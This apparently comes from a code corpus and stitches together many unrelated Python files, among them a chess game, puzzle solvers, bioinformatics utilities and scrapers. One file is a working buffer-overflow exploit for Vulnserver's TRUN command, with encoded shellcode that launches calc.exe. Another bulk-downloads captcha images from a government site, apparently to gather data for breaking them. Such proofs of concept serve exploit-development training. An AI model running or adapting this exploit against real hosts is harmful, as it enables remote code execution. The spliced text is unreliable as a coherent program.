grid = global_grid #[[Ruta() for i in range(8)] for j in range(8)]
#Skapa pjäser
player = Player(pjas_dict[player_side])
if opp:
bot = opp
else:
bot = Random_bot(pjas_dict[bot1_side])
if bot1_side == 'v':
bot.make_move(grid)
while going:
draw_grid(dis, grid)
pygame.display.update()
if your_move: #bot playing
your_move = bot.make_move(grid) # bot makes move
if your_move:
print(("Du van!!", "Patt!!")[(1,-1).index(your_move)])
your_move = 0
for event in pygame.event.get():
if event.type == pygame.QUIT:
going = False
if event.type == pygame.MOUSEBUTTONDOWN:
#Get position
x, y = event.pos
x, y = x // s, y // s
if not is_legit(x,y):
continue
available = grid[x][y].available
#Clear grid
for line in grid:
for square in line:
square.available = False
#Player makes move
if your_move == 0:
if available:
player.make_move((x,y), grid)
your_move = 1
else:
player.begin_move((x,y), grid)
clock.tick(20)
os.chdir('./pjaser')
global_grid = [[Ruta() for i in range(8)] for j in range(8)]
for i in range(0,8):
list_adress_p1, list_adress_p2 = glob.glob("*"+pjas_namn[i]+"_v*"), glob.glob("*"+pjas_namn[i]+"_s*")
p1 = Pjas(list_adress_p1[0], (i,0), pjas_namn[i], global_grid)
p2 = Pjas(list_adress_p2[0], (i,7), pjas_namn[i], global_grid)
bonde1, bonde2 = Pjas(glob.glob("*bonde_v*")[0], (i,1), "bonde_v", global_grid), Pjas(glob.glob("*bonde_s*")[0], (i,6), "bonde_s", global_grid)
vita.extend([p1, bonde1])
svarta.extend([p2, bonde2])
if __name__ == "__main__":
main() |
991,122 | d47587fe7decc58900936d0816ed93f82423857c | import sys
import re
def apply_mask(mask, value):
set_ones_mask = int(''.join('0' if char in ('X', '0') else '1' for char in mask), 2)
set_zeros_mask = int(''.join('1' if char in ('X', '1') else '0' for char in mask), 2)
value |= set_ones_mask
value &= set_zeros_mask
return value
def test():
mask = 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXX1XXXX0X'
print(apply_mask(mask, 11))
print(apply_mask(mask, 101))
print(apply_mask(mask, 0))
def main():
mask_re = re.compile('mask = ([X10]*)')
mem_re = re.compile('mem\[(\d*)\] = (\d*)')
mask = None
mem = {}
for line in sys.stdin:
line = line.rstrip()
match = mask_re.match(line)
if match:
mask = match.group(1)
continue
match = mem_re.match(line)
if not match:
sys.exit(f"Bad input line: {line}")
addr, value = (int(x) for x in match.groups())
mem[addr] = apply_mask(mask, value)
print(sum(mem.values()))
if __name__ == '__main__':
main()
|
991,123 | ec9403b63fd35d7aff86e244a2caca66996d72d9 | import os
import cv2
import numpy
import requests
import time
from img_processing import get_list_file
def download(url='https://www.tncnonline.com.vn/usercontrols/QTTJpegImage.aspx', extension='jpg', directory='img_file/', max_img=1000):
if not directory.endswith('/'):
directory += '/'
for x in range(max_img):
try:
save_location = directory + str(int(time.time())) + '.' + extension
content = requests.get(url, verify=False).content
with open(save_location, 'wb') as f:
f.write(content)
time.sleep(1)
except:
time.sleep(1)
continue
def check_all():
dir = 'img_file/'
files = get_list_file(dir)
total = 0
remove_lst = []
for i in range(len(files) - 1):
first_file = cv2.imread(dir + files[i])
for j in range(i + 1, len(files)):
second_file = cv2.imread(dir + files[j])
if numpy.array_equal(first_file, second_file):
total += 1
print(files[i] + '\t' + files[j])
remove_lst.append(files[j])
break
print(total)
for f in remove_lst:
os.remove(dir + f)
def check(file):
dir = 'img_file/'
files = get_list_file(dir)
if __name__ == '__main__':
download(
url='http://tracuunnt.gdt.gov.vn/tcnnt/captcha.png?uid=441c1083-94f2-4758-9688-a1104299d4b6',
extension='png', directory='tracuu', max_img=510
)
|
991,124 | 712d9b9bbc318d0e988e09b9359b1e4c96ea0dbd | #! /usr/bin/python
#
# Vulnserver TRUN Command Buffer Overflow Exploit POC
# Created By : @Ice3man
# Email : Iceman12@protonmail.com
#
# Common Info :
# Launches Calculator on Opening.
# Server Listens on Port : 9999 ( Commonly And Default )
# Pretty Simple : Neither DEP or Stack Canary Used.
#
# Copyrights : @Ice3man
# Regards : FuzzySecurity Blog
# : Corelan Team
# : SecuritySift
#
import socket
#----------------------- ShellCode ----------------------------------
#
# msfpayload -p windows/exec cmd=calc.exe -o R|
# msfencode -b '\x00\x0a\x0d' -t ruby
#
buf = ""
buf += "\xba\xdd\xfb\x26\x4c\xd9\xf6\xd9\x74\x24\xf4\x58\x31\xc9"
buf += "\xb1\x33\x31\x50\x12\x03\x50\x12\x83\x1d\xff\xc4\xb9\x61"
buf += "\xe8\x80\x42\x99\xe9\xf2\xcb\x7c\xd8\x20\xaf\xf5\x49\xf5"
buf += "\xbb\x5b\x62\x7e\xe9\x4f\xf1\xf2\x26\x60\xb2\xb9\x10\x4f"
buf += "\x43\x0c\x9d\x03\x87\x0e\x61\x59\xd4\xf0\x58\x92\x29\xf0"
buf += "\x9d\xce\xc2\xa0\x76\x85\x71\x55\xf2\xdb\x49\x54\xd4\x50"
buf += "\xf1\x2e\x51\xa6\x86\x84\x58\xf6\x37\x92\x13\xee\x3c\xfc"
buf += "\x83\x0f\x90\x1e\xff\x46\x9d\xd5\x8b\x59\x77\x24\x73\x68"
buf += "\xb7\xeb\x4a\x45\x3a\xf5\x8b\x61\xa5\x80\xe7\x92\x58\x93"
buf += "\x33\xe9\x86\x16\xa6\x49\x4c\x80\x02\x68\x81\x57\xc0\x66"
buf += "\x6e\x13\x8e\x6a\x71\xf0\xa4\x96\xfa\xf7\x6a\x1f\xb8\xd3"
buf += "\xae\x44\x1a\x7d\xf6\x20\xcd\x82\xe8\x8c\xb2\x26\x62\x3e"
buf += "\xa6\x51\x29\x54\x39\xd3\x57\x11\x39\xeb\x57\x31\x52\xda"
buf += "\xdc\xde\x25\xe3\x36\x9b\xda\xa9\x1b\x8d\x72\x74\xce\x8c"
buf += "\x1e\x87\x24\xd2\x26\x04\xcd\xaa\xdc\x14\xa4\xaf\x99\x92"
buf += "\x54\xdd\xb2\x76\x5b\x72\xb2\x52\x38\x15\x20\x3e\x91\xb0"
buf += "\xc0\xa5\xed"
# ------------------------ Info ------------------------------
print "[*] Vulnserver TRUN Command Buffer Overflow Exploit POC"
print "[*] Created By : Sh4d0w-l0rd"
print "[*] Email : Shad0w-l0rd@protonmail.com"
# ------------------------ Info ------------------------------
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # Creating Socket
ip = raw_input("\n\n[*] Please Enter IP : ") # Asking Target IP Address
port = raw_input("\n[*] Please Enter Port : ") # Asking Target Port
s.connect((ip, int(port))) #connecting to target
s.send("TRUN ." + "\x41"*2006 + "\xbb\x11\x50\x62" + "\x90"*16 + buf) # Sending Exploit
print "\n\n[*] Sending Exploit Payload . . ." # Sending Info
print "\n[*] Payload Send. Check If Calculator Popped Up.\n" # Sending Info
s.close() # Closing Socket
|
991,125 | 331cabcc912b875487de2c3d1083e88c11cd2197 | import random
from typing import List, Dict
from GameLogic.Players.Players import Player
from GameLogic.SysConfig import SysConfig
from GameLogic.Orders import Sell
from GameLogic.AssetFundNetwork import Asset, Fund
class Attacker(Player):
def __init__(self, initial_portfolio: Dict[str, int], goals: List[str], asset_slicing, max_assets_in_action):
super().__init__(0, initial_portfolio, asset_slicing, max_assets_in_action)
self.goals = goals
self.resources_exhusted_flag = False
def resources_exhusted(self):
if not self.portfolio:
self.resources_exhusted_flag = True
return self.resources_exhusted_flag
def is_goal_achieved(self, funds: Dict[str, Fund]):
for fund_symbol in self.goals:
if not funds[fund_symbol].is_in_margin_call():
return False
return True
def apply_order(self, order: Sell):
if not isinstance(order, Sell):
raise ValueError("attacker only sells")
self.initial_capital += order.share_price * order.num_shares
num_shares = self.portfolio[order.asset_symbol]
num_shares -= order.num_shares
if num_shares == 0:
del self.portfolio[order.asset_symbol]
else:
self.portfolio[order.asset_symbol] = num_shares
def game_reward(self, funds: List[Fund], history=None):
for fund in self.goals:
if not funds[fund].is_in_margin_call():
return -1
return 1
def get_valid_actions(self, assets: Dict[str, Asset]):
assets_list = [assets[x] for x in self.portfolio.keys()]
if self.max_assets_in_action > 1:
orders = self.gen_orders_rec(assets_list)
else:
orders = self.gen_single_asset_orders(assets_list)
if not orders:
self.resources_exhusted_flag = True
return orders
def gen_single_asset_orders(self, assets: List[Asset]):
if not assets:
return []
orders_list = []
for asset in assets:
for i in range(1, self.asset_slicing + 1):
shares_to_sell = int(i * self.portfolio[asset.symbol] / self.asset_slicing)
if asset.price * shares_to_sell < SysConfig.get(SysConfig.MIN_ORDER_VALUE): #ignore small orders
continue
order = Sell(asset.symbol, shares_to_sell, asset.price)
orders_list.append([order])
return orders_list
def gen_orders_rec(self, assets: List[Asset]):
if not assets:
return []
orders_list = []
asset = assets[0]
orders_to_add = self.gen_orders_rec(assets[1:])
orders_list.extend(orders_to_add)
for i in range(1, self.asset_slicing + 1):
shares_to_sell = int(i * self.portfolio[asset.symbol] / self.asset_slicing)
if asset.price * shares_to_sell < SysConfig.get(SysConfig.MIN_ORDER_VALUE): #ignore small orders
continue
order = Sell(asset.symbol, shares_to_sell, asset.price)
orders_list.append([order])
for orders in orders_to_add:
if len(orders) < self.max_assets_in_action:
order_including_asset = list(orders)
order_including_asset.append(order)
orders_list.append(order_including_asset)
return orders_list
def gen_orders_rec_old(self, assets: List[Asset]):
if not assets:
return []
orders_list = []
asset = assets[0]
sell_percent = self.sell_share_portion_jump
orders_to_add = self.gen_orders_rec(assets[1:])
orders_list.extend(orders_to_add)
while sell_percent <= 1:
shares_to_sell = int(sell_percent * self.portfolio[asset.symbol])
order = Sell(asset.symbol, shares_to_sell, asset.price)
orders_list.append([order])
for orders in orders_to_add:
if len(orders) < self.max_assets_in_action:
order_including_asset = list(orders)
order_including_asset.append(order)
orders_list.append(order_including_asset)
sell_percent += self.sell_share_portion_jump
return orders_list
def gen_random_action(self, assets: Dict[str, Asset] = None):
orders = []
portfolio_assets = list(self.portfolio.keys())
num_assets = min(len(portfolio_assets), random.randint(1, self.max_assets_in_action))
chosen_assets = random.sample(portfolio_assets, num_assets)
for sym in chosen_assets:
asset = assets[sym]
portion = random.randint(1, self.asset_slicing)
shares_to_sell = int(portion * self.portfolio[asset.symbol] / self.asset_slicing)
order = Sell(asset.symbol, shares_to_sell, asset.price)
orders.append(order)
return orders
def __str__(self):
return 'Attacker'
|
991,126 | a25aa2a139c26f9f9c38d4d32c9c539338128273 | import json
import time
import logging
import os
from lxml import etree
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.remote.remote_connection import LOGGER
from ..common import random_wait
class url_changed(object):
"""
An expectation checking that the url of current page has changed
since the object is created
"""
def __init__(self, url):
self.url = url
def __call__(self, driver, *args, **kwargs):
return driver.current_url != self.url
class LinkedIn(object):
url = "https://linkedin.com"
def __init__(self,
headless=True,
cache_path='./cached_cookies',
login_config='./login_config.json',
wait=10,
**kwargs):
if "login_email" in kwargs and "login_pass" in kwargs:
self.login_email = kwargs["login_email"]
self.login_pass = kwargs["login_pass"]
else:
login = json.load(open(login_config))
self.login_email = login["username"]
self.login_pass = login["password"]
options = webdriver.ChromeOptions()
if headless:
options.add_argument("--headless")
options.add_argument("--disable-extensions")
options.add_argument("--no-sandbox")
options.add_argument("--disable-gpu")
self.driver = webdriver.Chrome(executable_path='/usr/local/bin/chromedriver', chrome_options=options)
self.driver.implicitly_wait(wait)
self.default_wait = WebDriverWait(self.driver, wait)
self.driver.maximize_window()
self.cache_path = cache_path
# init logger
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
ch = logging.StreamHandler()
ch.setLevel(logging.DEBUG)
ch.setFormatter(formatter)
self.logger = logging.getLogger("_LinkedIn")
self.logger.setLevel(logging.DEBUG)
self.logger.addHandler(ch)
# set selenium logging level
LOGGER.setLevel(logging.WARNING)
def _cookie_file(self, username):
return self.cache_path + '/' + username + ".cookie"
def _cookie_cached(self, username):
return os.path.exists(self._cookie_file(username))
def login(self):
"""
Choose proper login method based on existing information
:return: void
"""
if self._cookie_cached(self.login_email):
self.cookie_login(self.login_email)
else:
self.new_login(self.login_email, self.login_pass)
def new_login(self, username, password, cache_cookie=True):
"""
First time login with username and password
:param username: username(email)
:param password: password
:param cache_cookie: whether to cache cookie or not
:return: void
"""
self.driver.delete_all_cookies()
self.driver.get(self.url)
self.driver.find_element_by_id("login-email").send_keys(username)
self.driver.find_element_by_id("login-password").send_keys(password)
self.driver.find_element_by_id("login-submit").click()
if cache_cookie:
with open(self._cookie_file(username), "w") as f:
json.dump(self.driver.get_cookies(), f)
def cookie_login(self, username):
"""
Try to login with cached cookie
Will raise exception if the cached cookie file is not found
:param username: used to identify cached cookie file
:return: void
"""
self.driver.get(self.url)
with open(self._cookie_file(username), "r") as f:
cookies = json.load(f)
for cookie in cookies:
self.driver.add_cookie(cookie)
self.driver.refresh()
@staticmethod
def _extract_search_results(html):
root = etree.HTML(html)
return root.xpath("//li[contains(@class, 'search-result')]//a[contains(@href, '/in')]/@href")
def _get_height(self):
height = self.driver.execute_script("return document.body.scrollHeight")
self.logger.debug("current page height {}".format(height))
return height
@random_wait(mean=1)
def _scrape_single_page(self, extract_data):
"""
Scrape a single page(scroll down to bottom) and click the next button
:param: extract_data function object to process page html
:return: scraped result, whether the page is the last page
"""
ret = set()
last_height = self._get_height()
while True:
ret.update(extract_data(self.driver.page_source))
self.driver.execute_script("window.scrollTo(0, document.body.scrollHeight)")
# wait to load page TODO need other indicator other than fixed sleep
time.sleep(0.5)
new_height = self._get_height()
if new_height == last_height:
break
last_height = new_height
has_next = False
next_xpath = "//button[@class='next']"
nexts = self.driver.find_elements_by_xpath(next_xpath)
if nexts:
self.default_wait.until(EC.element_to_be_clickable((By.XPATH, next_xpath)))
nexts[0].click()
self.default_wait.until(url_changed(self.driver.current_url))
has_next = True
return ret, has_next
def search(self, keyword, options=None, max_req=1000):
"""
perform a search action on linkedin website top search bar and return the result
links an list
:param keyword: search keyword entered in search-box
:param options: dictionary used to specify filter
:param max_req: max number of request made
:return: list
"""
# TODO add filter options
search_box = self.driver.find_element_by_xpath(
"//form[@id='extended-nav-search']//input[@placeholder='Search']")
search_box.send_keys(keyword)
search_box.send_keys(Keys.RETURN)
self.default_wait.until(url_changed(self.driver.current_url))
self.logger.info("Searching keyword {} \nwith options {}".format(keyword, options))
req_count = 0
ret = []
has_next = True
while has_next and req_count < max_req:
req_count += 1
self.logger.info("Request #{} to url {}".format(req_count, self.driver.current_url))
page_info, has_next = self._scrape_single_page(self._extract_search_results)
ret.extend(page_info)
return ret
@random_wait(mean=1)
def request_page(self, url, action=None):
"""
request the given url (GET) within the linkedin domain
:param url: either a full url or relative url
:param action: function that takes an driver object and act on the web page
:return: page html source
"""
if url.startswith(self.url):
self.driver.get(url)
else:
self.driver.get(self.url + url)
self.default_wait.until(EC.invisibility_of_element_located((By.XPATH, "//div[@class='loading-bar']")))
if action:
action(self.driver)
return self.driver.page_source
def close(self):
self.driver.close()
|
991,127 | 0960162ca2d403745fc46489e440c45cb5366b26 | import unittest
class Node(object):
def __init__(self, data=None, next=None):
self.data = data
self.next = next
def get_data(self):
return self.data
def get_next(self):
return self.next
def set_next(self, next):
self.next = next
def create_linked_list(arr):
head = Node(arr[0])
curr = head
for i in range(1, len(arr)):
curr.set_next(Node(arr[i]))
curr = curr.get_next()
return head
def linked_list_to_list(head):
curr = head
arr = []
while (curr != None):
arr.append(curr.get_data())
curr = curr.get_next()
return arr
def divide(arr):
result = []
divided = True
for head in arr:
test = head
count = 0
while test != None:
test = test.get_next()
count += 1
if count >= 2:
divided = False
if divided:
return arr
for head in arr:
temp = head
curr = temp
if curr.get_next() != None:
a = Node(curr.get_data())
a_head = a
curr = curr.get_next()
b = Node(curr.get_data())
b_head = b
curr = curr.get_next()
turn = True
while curr != None:
if turn == True:
a.set_next(curr)
a = a.get_next()
turn = False
else:
b.set_next(curr)
b = b.get_next()
turn = True
curr = curr.get_next()
a.set_next(None)
b.set_next(None)
result.append(a_head)
result.append(b_head)
else:
curr.set_next(None)
result.append(curr)
return divide(result)
def mend(arr):
n = [x.get_data() for x in arr]
index = n.index(min(n))
head = arr[index]
temp = head
arr.pop(index)
n.pop(index)
for i in range(len(arr)):
index = n.index(min(n))
temp.set_next(arr[index])
temp = temp.get_next()
arr.pop(index)
n.pop(index)
return head
def merge_sort(head):
res = divide([head])
return mend(res)
class tests(unittest.TestCase):
def test1(self):
linked = create_linked_list([1,10,14,2,5,12])
ordered = linked_list_to_list(create_linked_list([1,2,5,10,12,14]))
res = linked_list_to_list(merge_sort(linked))
self.assertEqual(res, ordered)
unittest.main() |
991,128 | 3e2207fb3cdb1c6ddc7d0783acdbc3b9341531e1 | #!/usr/bin/env python3
from socket import *
import sys
import signal
if (len(sys.argv) != 3):
print("Usage: receiver <file name> <timeout (ms)>")
sys.exit(0)
fileName = sys.argv[1]
timeout = int(sys.argv[2])
addr = ("0.0.0.0", 0)
receiverSocket = socket(AF_INET, SOCK_DGRAM)
receiverSocket.bind(addr)
print('listening on port:', receiverSocket.getsockname()[1])
portfile = open("port", "w")
portfile.write(str(receiverSocket.getsockname()[1])+"\n")
portfile.close()
outputfile = open(fileName, "wb")
numreceived = 0
bytesreceived = 0
data,addr = receiverSocket.recvfrom(16)
packetSize = int(data.decode('utf-8'))
def alarmhandler(signum, frame):
print(f'{numreceived} {bytesreceived}')
sys.exit(0)
signal.signal(signal.SIGALRM, alarmhandler)
signal.alarm(int(timeout/1000))
numreceived = 1
bytesreceived = 16
while True:
data,addr = receiverSocket.recvfrom(packetSize)
numreceived += 1
bytesreceived += packetSize
end = False
try:
text = data.decode()
if (text == ""):
end = True
except UnicodeDecodeError:
end = False
if (end == True):
break
outputfile.write(data)
#end while
outputfile.close()
print(f'{numreceived} {bytesreceived}')
|
991,129 | b12668f8d858a7569531327746240e548f4dc965 | #!/usr/bin/env python
with open('keys.txt') as my_file:
testsite_array = my_file.readlines()
thefile = open('test.txt', 'w')
for line in testsite_array:
print line;
thefile.write(str(int(line,16)))
thefile.write('\n\n')
|
991,130 | 0b6861c7340020c5d9a92bde55af1cfff33ddb49 | def cal_array_w_v_pair(w_v_pair, hight, now_weight, now_value,
limit, return_array):
# pythonの配列は参照渡しであるので、return_arrayに加えることで値が追加される
if hight < limit:
cal_array_w_v_pair(w_v_pair, hight + 1, now_weight, now_value,
limit, return_array)
now_weight += w_v_pair[hight][0]
now_value += w_v_pair[hight][1]
cal_array_w_v_pair(w_v_pair, hight + 1, now_weight, now_value,
limit, return_array)
else:
return_array.append((now_weight, now_value))
def cal_max_value(front_w_v_pair, back_w_v_pair, limit_weight):
max_value = 0
left = 0
right = len(back_w_v_pair) - 1
while right >= 0 and left < len(front_w_v_pair):
now_weight = front_w_v_pair[left][0] + back_w_v_pair[right][0]
now_value = front_w_v_pair[left][1] + back_w_v_pair[right][1]
if now_weight <= limit_weight:
# weightの合計がlimit_weight以下の時、weightを大きくできる、解の候補でもある
max_value = max(max_value, now_value)
left += 1
else:
# weightの合計がlimit_weightより大きい時、weightは小さくしなければならない
right -= 1
return max_value
def check(array):
increase_array = []
max_value = -1
for i in range(len(array)):
if max_value < array[i][1]:
# weightが増えた時価値が上がる場合
max_value = array[i][1]
increase_array.append(array[i])
return increase_array
def main():
# 入力
N, limit_weight = map(int, input().split())
w_v_pair = []
for i in range(N):
v, w = map(int, input().split())
w_v_pair.append((w, v))
front_w_v_pair = []
back_w_v_pair = []
half = int(N / 2)
# 半分全列挙を使ってそれぞれの組み合わせをだしておく
cal_array_w_v_pair(w_v_pair, 0, 0, 0, half, front_w_v_pair)
cal_array_w_v_pair(w_v_pair, half, 0, 0, N, back_w_v_pair)
# 尺取り法を用いるためsortしておく
front_w_v_pair.sort()
back_w_v_pair.sort()
# weightが増えたときに、価値が上がらないと尺取り法は使えないので、そのような組み合わせを弾く
increase_front_w_v_pair = check(front_w_v_pair)
increase_back_w_v_pair = check(back_w_v_pair)
max_value = cal_max_value(increase_front_w_v_pair,
increase_back_w_v_pair, limit_weight)
print(max_value)
if __name__ == "__main__":
main()
|
991,131 | c8b81b42fc6d859d48fbd3f21ea5b0475fafec63 | from my.utils.s3_1 import s3_iter
from sys import argv
########################################################################################################################
if len(argv) > 1:
prefix, = argv[1:]
else:
prefix = None
for x in s3_iter(prefix=prefix):
print(x.key)
########################################################################################################################
|
991,132 | f140a38c4aa97912fce0f3b6d3ae7f443553d9fb | from sanic import Sanic
Sanic.test_mode = True
|
991,133 | a4dae3c77c8b46a86bcc9b83651dcc3adbae934d | import socket, pickle
from _thread import *
host="10.250.86.32"
port=19382
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((host, port))
print(host, port)
s.listen(1)
def RecieveData (conn):
print(conn)
print("Data recieved : ")
x=conn.recv(1024)
print(x.decode())
x=x.decode()
while 1:
if not x:
break
print(type(x))
print(x)
reply= "Data successfully received" +x
x="Welcome to server "
conn.sendall(x.encode())
conn.sendall(reply.encode())
conn.close()
while True:
conn, addr=s.accept()
start_new_thread(RecieveData(conn))
s.close() |
991,134 | 29f6943aea66c04fe2793e31c2bd84e407b95bd2 | '''
Given the root of a binary tree, print its level-order traversal. For example:
1
/ \
2 3
/ \
4 5
The following tree should output 1, 2, 3, 4, 5.
'''
class Node:
def __init__(self, val, left=None, right=None):
self.val = val
self.left = left
self.right = right
def print_level_order(root):
level = [root]
while level:
tmp_level = []
for x in level:
if x.left:
tmp_level.append(x.left)
if x.right:
tmp_level.append(x.right)
print(x.val, end=' ')
level = tmp_level
# Fill this in.
root = Node(1, Node(2), Node(3, Node(4), Node(5)))
print_level_order(root)
# 1 2 3 4 5
|
991,135 | 5450b2c0100610e142d06f04fa129284f8d0504e | # coding=utf-8
from rest_framework import serializers
from models import Cmd
class CmdSerializers(serializers.HyperlinkedModelSerializer):
class Meta:
model = Cmd
fields = ('id', 'name', 'cmd', 'status', 'result', 'url')
|
991,136 | ae15ab2b1c932609813a43a5b75d0c0c095faad1 |
import configparser
from matplotlib.patches import Ellipse
import matplotlib.pyplot as plt
import numpy as np
import os
import pandas as pd
from scipy import stats
import seaborn as sns
from sklearn.decomposition import PCA
def process_config(config_file=''):
"""
by default looks for config file in the same directory as the script
:param config_file:
:return:
"""
if not config_file:
config_file = os.path.join(os.path.dirname(os.path.abspath(__file__)), "config")
config = configparser.ConfigParser()
config.read(config_file)
config_dict = {}
for section in config.sections():
config_dict[section] = {name: value for name, value in config.items(section)}
return config_dict
def to_str(bytes_or_str):
if isinstance(bytes_or_str, bytes):
value = bytes_or_str.decode("utf-8")
else:
value = bytes_or_str
return value
def to_bytes(bytes_or_str):
if isinstance(bytes_or_str, str):
value = bytes_or_str.encode('utf-8')
else:
value = bytes_or_str
return value
"""
Plotting PCA elipses:
__author__:
"""
def plot_point_cov(points, nstd=2, ax=None, **kwargs):
"""
Plots an `nstd` sigma ellipse based on the mean and covariance of a point
"cloud" (points, an Nx2 array).
Parameters
----------
points : An Nx2 array of the data points.
nstd : The radius of the ellipse in numbers of standard deviations.
Defaults to 2 standard deviations.
ax : The axis that the ellipse will be plotted on. Defaults to the
current axis.
Additional keyword arguments are pass on to the ellipse patch.
Returns
-------
A matplotlib ellipse artist
"""
pos = points.mean(axis=0)
cov = np.cov(points, rowvar=False)
return plot_cov_ellipse(cov, pos, nstd, ax, **kwargs)
def plot_cov_ellipse(cov, pos, nstd=2, ax=None, **kwargs):
"""
Plots an `nstd` sigma error ellipse based on the specified covariance
matrix (`cov`). Additional keyword arguments are passed on to the
ellipse patch artist.
Parameters
----------
cov : The 2x2 covariance matrix to base the ellipse on
pos : The location of the center of the ellipse. Expects a 2-element
sequence of [x0, y0].
nstd : The radius of the ellipse in numbers of standard deviations.
Defaults to 2 standard deviations.
ax : The axis that the ellipse will be plotted on. Defaults to the
current axis.
Additional keyword arguments are pass on to the ellipse patch.
Returns
-------
A matplotlib ellipse artist
"""
def eigsorted(cov):
vals, vecs = np.linalg.eigh(cov)
order = vals.argsort()[::-1]
return vals[order], vecs[:,order]
if ax is None:
ax = plt.gca()
vals, vecs = eigsorted(cov)
theta = np.degrees(np.arctan2(*vecs[:,0][::-1]))
# Width and height are "full" widths, not radius
width, height = 2 * nstd * np.sqrt(vals)
ellip = Ellipse(xy=pos, width=width, height=height, angle=theta, **kwargs)
ax.add_artist(ellip)
return ellip
def find_pc1_pc2(df, meta):
df = df.T
pca = PCA(n_components=2)
principalComponents = pca.fit_transform(df)
pDf = (pd.DataFrame(data=principalComponents, columns=['PC1', 'PC2'])
.set_index(df.index))
pc1_var = round(pca.explained_variance_ratio_[0] * 100, 2)
pc2_var = round(pca.explained_variance_ratio_[1] * 100, 2)
pDf2 = pDf.merge(meta, left_index=True, right_index=True)
return pDf2, pc1_var, pc2_var
def plotPCA(pDf, pc1_var, pc2_var, colorby, col, nameby="", el=False):
sns.set_style("ticks")
sns.set_context("notebook", font_scale=2.2)
group = pDf[colorby].unique()
assert len(group) <= len(col)
fig = plt.figure(figsize=(8, 8))
for g, c in zip(group, col):
df = pDf[pDf[colorby] == g]
x, y = df[["PC1"]].values, df[["PC2"]].values
ax = plt.scatter(x, y, c=c, s=150, label=g)
if el:
pts = np.asarray([[float(a), float(b)] for a, b in zip(x, y)])
plot_point_cov(pts, nstd=2, alpha=0.1, color=c)
if nameby:
labels = df[nameby]
for label, pc1, pc2 in zip(labels, x, y):
plt.annotate(label, xy=(pc1, pc2), xytext=(-5, 7), textcoords="offset points",fontsize=14)
plt.xlabel('Principal Component 1, {} %'.format(pc1_var), )
plt.ylabel('Principal Component 2, {} %'.format(pc2_var), )
#plt.xticks(fontsize=16)
#plt.yticks(fontsize=16)
plt.legend(frameon=True)
return fig
def invnorm(x):
return stats.norm.ppf((x.rank() - 0.5)/x.count())
def process_gff(gff_file, feat='CDS', id_sym="gene_id="):
"""
Only been counting features that are 'CDS', consequently here also only looking at
lines that have CDS in them
:param gff_file:
:return: dictionary of gene_id: gene length in kb
"""
gene_to_gene_length = {}
with open(gff_file, "r") as fh:
for line in fh:
line = line.strip()
if line.startswith('>'):
break
elif line.startswith(("#", " ")) or len(line) == 0:
continue
elif line.split('\t')[2] != feat:
continue
else:
start = int(line.split("\t")[3].strip())
end = int(line.split("\t")[4].strip())
gene_length = abs(end - start)/1000
#prokka = line.split("\t")[-1].split(";")[0].strip(id_sym)
prokka = line.split("\t")[-1].split(id_sym)[1].split(";")[0]
# This would give me the prokka id
gene_to_gene_length[prokka] = gene_length
return gene_to_gene_length
def process_count_file(count_file):
line = (l.split("\t") for l in open(count_file))
counts = {g[0]: int(g[1].strip()) for g in line}
return counts
def calculate_tpm(counts_dict, gene_len_dict):
total_rpk = 0
temp_rpk = {}
for gene, count in counts_dict.items():
if gene.startswith("__"): # HTSeq specific: end of file has __total_mapped reads, etc.
continue
try:
gene_length = gene_len_dict[gene]
except KeyError:
continue # skipping genes we don't have length for
else:
rpk = count/gene_length
total_rpk += rpk
temp_rpk[gene] = rpk
total_rpk /= 1000000 # Make sure this is a million
tpm = {gene: rpk/total_rpk for gene, rpk in temp_rpk.items()}
return tpm
def normalize_counts_to_tpm_one_file(cf, gff, feat='CDS', id_sym='gene_id='):
counts_dict = process_count_file(cf)
strain = os.path.basename(cf).split("_")[0]
if os.path.isdir(gff):
gff_file = os.path.join(gff, "{}.gff".format(strain))
else:
gff_file = gff
gene_len_dict = process_gff(gff_file, feat, id_sym)
tpm = calculate_tpm(counts_dict, gene_len_dict)
return tpm
def normalize_counts_to_tpm(counts_dir, gff_dir, out_dir, feat='CDS', id_sym='gene_id='):
"""
Assumes names of counts strats with strain, and gff named strain.gff
:param counts_dir:
:param gff_dir:
:param out_dir:
:return:
"""
count_files = [os.path.join(counts_dir, f) for f in os.listdir(counts_dir)]
all_tpms = {}
for cf in count_files:
if "_counts" not in cf:
continue
tpm = normalize_counts_to_tpm_one_file(cf, gff_dir, feat, id_sym)
#out_file = "{}_tpm.csv".format(os.path.basename(cf))
#out_path = os.path.join(out_dir, out_file)
#with open(out_path, "w") as fo:
# for gene, t in tpm.items():
# fo.write("{},{}\n".format(gene, t))
prefix = os.path.basename(cf).split("_trimmed")[0] # this would be specific to my naming convention
all_tpms[prefix] = tpm
return all_tpms
def get_tpms_for_prokkas(pa_matrix, tpm_df):
df_list = []
for cl in tpm_df.columns:
strain = cl.split('_')[0]
d = tpm_df[cl].to_dict()
df = pd.DataFrame()
df[cl] = pa_matrix[strain].map(d)
df_list.append(df)
return pd.concat(df_list, axis=1)
def get_labels(df):
""" df.index needs to be in form strain_condition"""
labels = []
for i in df.index:
label = sample_label_from_sample_name(i)
labels.append(label)
return labels
def sample_label(strain, treat, jn=" | "):
return strain + jn + treat
def sample_label_from_sample_name(sample_name, ur="URINE", uti="PATIENT"):
strain = sample_name.split("_")[0]
condition = ur if sample_name.split("_")[1] == "UR" else uti
return sample_label(strain, condition)
|
991,137 | 0ee76a471dcfe4334222a81cf56ffa5a4d8f92df | ####
### Title: Chapter 12 Question 14
### Author: Spencer Riley
### Python Version: 3.5.3
####
# Import Stuff
from numpy import *
import matplotlib.pyplot as plt
import chaosmod as cm
from scipy.interpolate import interp1d
from matplotlib.ticker import MultipleLocator, FuncFormatter
# Main input parameters (any of the three can be a list of inputs)
gamma = 1.084 # Drive strength (dimensionless)
# Additional inputs (defined in terms of the drive frequency w)
w0 = 1.5 # w0 in units of w
beta = w0/4.0 # Damping factor in units of w
# Time range parameters
tmax = 7 # Duration of simulation in units of the drive period T = 2*pi/w
dt = 1e-2 # Time step for numerical integration in units of T
t = arange(0,tmax,dt)
# Solve DDP equation
phi0 = 0 # Initial angle (rad)
phidot0 = 0 # Initial angular velocity (rad/s)
